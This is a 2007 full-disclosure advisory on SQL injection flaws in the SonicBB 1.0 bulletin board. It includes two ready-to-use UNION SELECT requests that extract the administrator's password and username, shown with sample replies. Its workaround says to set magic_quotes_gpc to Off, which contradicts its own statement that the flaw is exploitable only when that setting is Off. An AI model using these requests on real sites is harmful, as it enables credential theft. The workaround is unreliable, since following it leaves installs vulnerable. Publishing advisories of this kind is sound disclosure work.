[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] SonicBB version 1.0 Multiple SQL Injection
From: "SecurityResearch" <securityresearch () netvigilance ! com>
Date: 2007-05-14 12:31:42
Message-ID: 012FDE7DE21D97498794A72AEEF90D7F06A520 () beaverton ! portland ! local
[Download RAW message or body]
netVigilance Security Advisory #19
SonicBB version 1.0 Multiple SQL Injection Vulnerabilities
Description:
SonicBB is a user-friendly and fully customizable bulletin board package. SonicBB is \
compatible with any web server/operating system combo with PHP 4.x or higher \
installed.SonicBB is the ideal community software for all sites. This vulnerabilities \
can be exploited only when PHP magic_quotes_gpc = Off. External References:
Mitre CVE: CVE-2007-1902
NVD NIST: CVE-2007-1902
OSVDB: 33907
Summary:
SonicBB is a user-friendly and fully customizable bulletin board package. SonicBB is \
compatible with any web server/operating system combo with PHP 4.x or higher \
installed. SonicBB is the ideal community software for all sites. Security problems \
in the product allow attackers commit SQL injections Advisory URL:
http://www.netvigilance.com/advisory0019
Release Date:
05/14/2007
Severity:
Risk: High
CVSS Metrics
Access Vector: Remote
Access Complexity: High
Authentication: Not-required
Confidentiality Impact: Complete
Integrity Impact: Partial
Availability Impact: Partial
Impact Bias: Confidentiality
CVSS Base Score: 6.8
Target Distribution on Internet: Low
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Confirmed
Vulnerability Impact: Attack
Host Impact: SQL Injection.
SecureScout Testcase ID:
TC 17945
Vulnerable Systems:
SonicBB version 1.0
Vulnerability Type:
SQL injection allows malicious people to execute their own SQL scripts. This could be \
exploited to obtain sensitive data, modify database contents or acquire \
administrator's privileges. Vendor:
iScripts
Vendor Status:
Contact with the Vendor was established and draft of the security advisory was \
provided on 10 April 2007, the vendor promised to fix the issue but stopped \
responding to our emails on 10 April 2007. There is no official fix at the release \
of this Security Advisory Workaround:
Modify in the php.ini file following line: magic_quotes_gpc = Off.
Example:
SQL Injection Vulnerability 1:
REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/ search.php?query=1&part=post`<> '' UNION SELECT \
`id`,`password`,1,1,1,1,`username` FROM `users` WHERE id=1/*&by=*/ REPLY:
<table width="100%" cellspacing="1" cellpadding="5" class="forums"><tr><td \
width="40%" class="alt5">Post Title</td><td width="60%" class="alt5"> \
Author</td></tr><tr><td class="alt8"><a href="viewthread.php?id=1&p=1#post1"> Test \
Thread</a></td> <td class="alt7"><b><a href="members.php?id=1">admin</a> \
</b></td></tr><tr><td class="alt8"><a href="viewthread.php?id=1&p=1#post1"> [SQL \
INJECTION RESULT - ADMIN PASSWORD]</a></td><td class="alt7"><b><a \
href="members.php?id=1">[SQL INJECTION RESULT - ADMIN NAME]</a></b></td> ... SQL \
Injection Vulnerability 2: REQUEST:
http://[TARGET]/[PRODUCT-DIRECTORY]/viewforum.php?id=1' UNION SELECT \
`id`,`password`,1,1,1,1,1 FROM `users` WHERE id=1%23 REPLY:
... <a href="viewthread.php?id=1">[SQL INJECTION RESULT - ADMIN PASSWORD]</a><br \
/>By <a href="members.php?id=1">...
Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.c
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic